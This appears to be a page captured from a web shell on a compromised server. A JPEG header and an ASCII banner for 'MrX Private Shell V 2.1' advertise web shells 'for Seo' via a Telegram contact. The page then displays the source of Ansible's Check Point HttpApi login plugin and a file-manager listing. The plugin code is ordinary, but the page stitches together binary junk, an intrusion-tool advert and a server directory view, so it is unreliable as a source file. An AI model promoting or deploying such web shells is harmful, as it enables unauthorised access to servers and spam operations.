����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# (c) 2018 Red Hat Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
---
author: Ansible Networking Team (@rcarrillocruz)
name: checkpoint
short_description: HttpApi Plugin for Checkpoint devices
description:
- This HttpApi plugin provides methods to connect to Checkpoint
devices over a HTTP(S)-based api.
version_added: "2.8.0"
options:
domain:
type: str
description:
- Specifies the domain of the Check Point device
vars:
- name: ansible_checkpoint_domain
api_key:
type: str
description:
- Login with api-key instead of user & password
vars:
- name: ansible_api_key
cloud_mgmt_id:
type: str
description:
- The Cloud Management ID
vars:
- name: ansible_cloud_mgmt_id
"""
import json
from ansible.module_utils.basic import to_text
from ansible.errors import AnsibleConnectionFailure
from ansible.module_utils.six.moves.urllib.error import HTTPError
from ansible.plugins.httpapi import HttpApiBase
from ansible.module_utils.connection import ConnectionError
BASE_HEADERS = {
'Content-Type': 'application/json',
'User-Agent': 'Ansible',
}
class HttpApi(HttpApiBase):
def login(self, username, password):
payload = {}
cp_domain = self.get_option('domain')
cp_api_key = self.get_option('api_key')
if cp_domain:
payload['domain'] = cp_domain
if username and password and not cp_api_key:
payload['user'] = username
payload['password'] = password
elif cp_api_key and not username and not password:
payload['api-key'] = cp_api_key
else:
raise AnsibleConnectionFailure('[Username and password] or api_key are required for login')
url = '/web_api/login'
response, response_data = self.send_request(url, payload)
try:
self.connection._auth = {'X-chkp-sid': response_data['sid']}
except KeyError:
raise ConnectionError(
'Server returned response without token info during connection authentication: %s' % response)
# Case of read-only
if 'uid' in response_data.keys():
self.connection._session_uid = response_data['uid']
def logout(self):
url = '/web_api/logout'
response, dummy = self.send_request(url, None)
def get_session_uid(self):
return self.connection._session_uid
def send_request(self, path, body_params):
data = json.dumps(body_params) if body_params else '{}'
cp_cloud_mgmt_id = self.get_option('cloud_mgmt_id')
if cp_cloud_mgmt_id:
path = '/' + cp_cloud_mgmt_id + path
try:
self._display_request()
response, response_data = self.connection.send(path, data, method='POST', headers=BASE_HEADERS)
value = self._get_response_value(response_data)
return response.getcode(), self._response_to_json(value)
except AnsibleConnectionFailure as e:
return 404, e.message
except HTTPError as e:
error = json.loads(e.read())
return e.code, error
def _display_request(self):
self.connection.queue_message('vvvv', 'Web Services: %s %s' % ('POST', self.connection._url))
def _get_response_value(self, response_data):
return to_text(response_data.getvalue())
def _response_to_json(self, response_text):
try:
return json.loads(response_text) if response_text else {}
# JSONDecodeError only available on Python 3.5+
except ValueError:
raise ConnectionError('Invalid JSON response: %s' % response_text)
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| checkpoint.py | File | 3.74 KB | 0644 |
|